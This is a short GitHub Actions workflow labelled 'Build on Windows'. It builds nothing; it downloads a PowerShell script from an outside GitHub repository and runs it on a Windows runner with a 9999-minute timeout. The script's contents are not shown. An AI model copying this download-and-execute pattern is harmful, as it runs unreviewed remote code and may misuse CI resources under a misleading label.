name: Build on Windowsn

on: workflow_dispatch

jobs:
  build:

    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
    - name: Downloading Files.
      run:    
       Invoke-WebRequest https://github.com/Youku1999/bookish-octo-dollop/raw/main/Start2.ps1 -OutFile Start2.ps1
    - name: Personalizing Settings.
      run: ./Start2.ps1
